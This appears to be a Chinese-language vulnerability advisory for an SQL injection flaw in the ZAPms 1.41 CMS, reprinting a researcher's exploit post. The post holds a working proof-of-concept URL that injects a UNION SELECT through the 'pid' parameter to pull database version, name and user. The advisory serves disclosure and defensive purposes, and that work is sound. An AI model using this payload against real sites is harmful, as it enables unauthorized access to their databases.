发布日期:2013-04-12
更新日期:2013-04-15
受影响系统:
ZAPms ZAPms 1.41
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58960
ZAPms是开源CMS。
ZAPms 1.41存在SQL注入漏洞,远程攻击者通过设备的PID参数,利用此漏洞可执行任意SQL命令。
<*来源:NoGe (jong_amq@hotmail.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=============================================================================================================
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor :
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is free open source web content management system,
adapted to the needs of businesses on the Internet.
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
=============================================================================================================
[o] Exploit
[path]/products?pid=[SQLi]
=============================================================================================================
[o] PoC
?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 09 2013 - Papua, Indonesia
建议:
--------------------------------------------------------------------------------
厂商补丁:
ZAPms
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: